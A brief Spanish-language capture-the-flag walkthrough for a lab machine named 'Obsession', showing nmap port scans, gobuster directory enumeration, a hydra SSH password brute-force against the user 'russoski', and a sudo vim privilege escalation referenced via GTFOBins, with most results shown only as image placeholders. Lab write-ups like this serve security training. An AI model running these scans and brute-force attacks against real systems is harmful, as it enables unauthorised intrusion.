1 min
Obsession

Máquina

Toolsh1

  • nmap
  • gobuster
  • hydra

Explicaciónh1

En primer lugar, realizaremos un reconocimiento de los puertos abiertos en la máquina utilizando nmap:

Terminal window
nmap -sS -sV --open -n --version-intensity 5 -T3 -p- 172.17.0.2
nmap -p 22,80 -A -O 172.17.0.2 -oN ports.txt
image.png

Observamos un servicio FTP, un servidor HTTP y un SSH abiertos. Al acceder al servidor web, encontramos la siguiente página:

image.png

Ejecutamos gobuster para enumerar los recursos accesibles:

Terminal window
gobuster dir -u http://172.17.0.2:80 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,html,js,txt
image.png

Descubrimos una ruta interesante llamada backup:

image.png

Con el nombre de usuario obtenido, podemos realizar un ataque de fuerza bruta mediante hydra para acceder vía SSH:

Terminal window
hydra -l russoski -P /usr/share/wordlists/rockyou.txt -t 16 ssh://172.17.0.2
image.png

Con las credenciales de russoski, podemos acceder al servidor:

image.png

Ejecutamos sudo -l para verificar si el usuario puede ejecutar algún binario con privilegios de root:

image.png

Buscamos en GTFOBins un exploit para iniciar una shell como root utilizando vim:

image.png image.png
  • DONE